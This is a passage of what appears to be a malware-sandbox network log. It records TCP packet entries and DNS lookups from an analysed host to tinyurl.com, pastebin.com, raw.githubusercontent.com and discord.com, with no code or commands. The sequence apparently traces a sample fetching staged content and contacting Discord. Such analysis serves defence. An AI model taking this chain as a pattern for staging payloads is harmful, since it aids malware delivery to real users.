                                                            Oct 15, 2024 16:00:00.672143936 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.673691034 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.673698902 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.673933029 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.674993038 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.690895081 CEST49748443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.690912008 CEST49749443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.709007978 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.709239960 CEST44349750104.20.4.235192.168.2.6
                                                            Oct 15, 2024 16:00:00.709309101 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 16:00:00.719440937 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.730228901 CEST49750443192.168.2.6104.20.4.235
                                                            Oct 15, 2024 16:00:00.738440037 CEST4975780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.743469954 CEST8049757185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.743554115 CEST4975780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.743700981 CEST4975780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.748544931 CEST8049757185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800096035 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800278902 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800385952 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800453901 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.800478935 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800507069 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800548077 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.800657034 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.800717115 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.800733089 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.809098959 CEST44349751185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:00.809182882 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:00.833772898 CEST49751443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.335105896 CEST8049757185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:01.335289001 CEST8049757185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:01.335397959 CEST4975780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.370908022 CEST4975780192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.372127056 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.372164965 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:01.372368097 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.372535944 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:01.372549057 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:01.376822948 CEST8049757185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.206841946 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.206948042 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.208838940 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.208883047 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.209722996 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.210874081 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.255414963 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.336810112 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.336893082 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.336929083 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.336962938 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.336997986 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337044954 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.337201118 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337543011 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337590933 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.337595940 CEST44349763185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:02.337635994 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:02.371541977 CEST49763443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:14.926139116 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926172018 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:14.926248074 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926711082 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:14.926721096 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.550414085 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.550508022 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.552896976 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.552910089 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.553211927 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.558527946 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.603406906 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.603470087 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.603483915 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804527044 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804595947 CEST44349832162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:15.804647923 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:15.811532974 CEST49832443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:20.943571091 CEST4974680192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:23.738998890 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.744002104 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:23.744081974 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.747190952 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:23.752228022 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.372405052 CEST8049881172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.408894062 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.408917904 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.408973932 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.412473917 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.412491083 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:24.427001953 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:24.791786909 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.791827917 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.791884899 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.792280912 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.792293072 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.835525990 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.835565090 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.835738897 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.836108923 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.836119890 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.843242884 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843254089 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:24.843311071 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843672991 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:24.843683958 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.042205095 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.042296886 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.047880888 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.047898054 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.048206091 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.063615084 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.107424021 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208010912 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208123922 CEST44349885172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:25.208200932 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.218395948 CEST49885443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:25.231405973 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.236310005 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:25.237832069 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.237832069 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:25.242763042 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:25.430219889 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.430321932 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.431643009 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.431651115 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.431982040 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.439877033 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.462430000 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.462527037 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.464176893 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.464185953 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.464437962 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.467943907 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.468060017 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.472271919 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.473377943 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.473385096 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.473745108 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.481935978 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.483413935 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.483479977 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.483498096 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.519399881 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.519478083 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.519484997 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.527400017 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.527488947 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.527497053 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665034056 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665102959 CEST44349888162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.665179968 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.667272091 CEST49888443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.701997995 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.702058077 CEST44349890162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.702244997 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.704128027 CEST49890443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.715435028 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.715507984 CEST44349889162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:25.715564966 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:25.717662096 CEST49889443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:26.832339048 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832544088 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832568884 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.832592964 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.832803965 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.832998037 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.833522081 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834014893 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834045887 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834070921 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834104061 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834439993 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.834446907 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834574938 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:26.834649086 CEST4989480192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:26.840101957 CEST8049894185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.460865021 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.460948944 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.463776112 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.463788986 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.464036942 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.465332985 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.507409096 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589804888 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589901924 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589936972 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.589976072 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.589993000 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590104103 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.590429068 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590480089 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590534925 CEST44349898185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:27.590576887 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:27.614614010 CEST49898443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:30.701647043 CEST4972880192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:30.767364979 CEST4972980192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:30.781321049 CEST4972780192.168.2.6104.17.112.233
                                                            Oct 15, 2024 16:00:31.873744965 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.878659010 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:31.878863096 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.882006884 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:31.886787891 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.495598078 CEST8049926172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.526787996 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.526804924 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:32.527327061 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.536262989 CEST4992680192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.638179064 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:32.638196945 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.275880098 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.275953054 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.277676105 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.277683020 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.277911901 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.284003019 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.331404924 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.455986023 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.456073999 CEST44349932172.67.19.24192.168.2.6
                                                            Oct 15, 2024 16:00:33.456144094 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.467989922 CEST49932443192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:33.494296074 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.499531031 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:33.499727011 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.499825001 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:33.504734039 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.105288029 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.105582952 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106259108 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.106398106 CEST4993880192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106463909 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106503963 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.106575012 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106833935 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.106853962 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.110455036 CEST8049938185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.726484060 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.726577997 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.728061914 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.728075981 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.728315115 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.733268023 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.775449038 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865080118 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865128994 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865149021 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865173101 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865195036 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865197897 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865227938 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.865240097 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865313053 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.865319967 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.871711016 CEST44349944185.199.109.133192.168.2.6
                                                            Oct 15, 2024 16:00:34.871834040 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:34.917110920 CEST49944443192.168.2.6185.199.109.133
                                                            Oct 15, 2024 16:00:40.124465942 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124528885 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.124615908 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124947071 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.124964952 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.777465105 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.777565002 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.779262066 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.779288054 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.779545069 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.780528069 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.823410034 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:40.823470116 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:40.823493958 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:41.031773090 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:41.031841040 CEST44349971162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:41.031893969 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:41.033967972 CEST49971443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:46.195039988 CEST4988180192.168.2.6172.67.19.24
                                                            Oct 15, 2024 16:00:47.537796021 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:47.537846088 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:47.537924051 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:47.538311005 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:47.538322926 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.153739929 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.153821945 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:48.155211926 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:48.155220985 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.155479908 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.156297922 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:48.199402094 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.202044010 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:48.202069998 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.382080078 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.382143974 CEST44350012162.159.136.232192.168.2.6
                                                            Oct 15, 2024 16:00:48.382231951 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:48.384340048 CEST50012443192.168.2.6162.159.136.232
                                                            Oct 15, 2024 16:00:53.418826103 CEST4992680192.168.2.6172.67.19.24
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 15, 2024 15:59:57.439223051 CEST5416753192.168.2.61.1.1.1
                                                            Oct 15, 2024 15:59:57.446043015 CEST53541671.1.1.1192.168.2.6
                                                            Oct 15, 2024 15:59:58.104053974 CEST6167053192.168.2.61.1.1.1
                                                            Oct 15, 2024 15:59:58.111968040 CEST53616701.1.1.1192.168.2.6
                                                            Oct 15, 2024 15:59:59.136423111 CEST5937553192.168.2.61.1.1.1
                                                            Oct 15, 2024 15:59:59.145500898 CEST53593751.1.1.1192.168.2.6
                                                            Oct 15, 2024 16:00:14.917185068 CEST5883553192.168.2.61.1.1.1
                                                            Oct 15, 2024 16:00:14.925441027 CEST53588351.1.1.1192.168.2.6
                                                            Oct 15, 2024 16:00:23.725825071 CEST6170653192.168.2.61.1.1.1
                                                            Oct 15, 2024 16:00:23.732774019 CEST53617061.1.1.1192.168.2.6
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 15, 2024 15:59:57.439223051 CEST192.168.2.61.1.1.10x8d86Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:58.104053974 CEST192.168.2.61.1.1.10x5648Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:59.136423111 CEST192.168.2.61.1.1.10x2be3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.917185068 CEST192.168.2.61.1.1.10xc870Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:23.725825071 CEST192.168.2.61.1.1.10xf47fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 15, 2024 15:59:53.046111107 CEST1.1.1.1192.168.2.60x8afbNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Oct 15, 2024 15:59:53.046111107 CEST1.1.1.1192.168.2.60x8afbNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:57.446043015 CEST1.1.1.1192.168.2.60x8d86No error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:57.446043015 CEST1.1.1.1192.168.2.60x8d86No error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:58.111968040 CEST1.1.1.1192.168.2.60x5648No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:58.111968040 CEST1.1.1.1192.168.2.60x5648No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:58.111968040 CEST1.1.1.1192.168.2.60x5648No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:59.145500898 CEST1.1.1.1192.168.2.60x2be3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:59.145500898 CEST1.1.1.1192.168.2.60x2be3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 15:59:59.145500898 CEST1.1.1.1192.168.2.60x2be3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
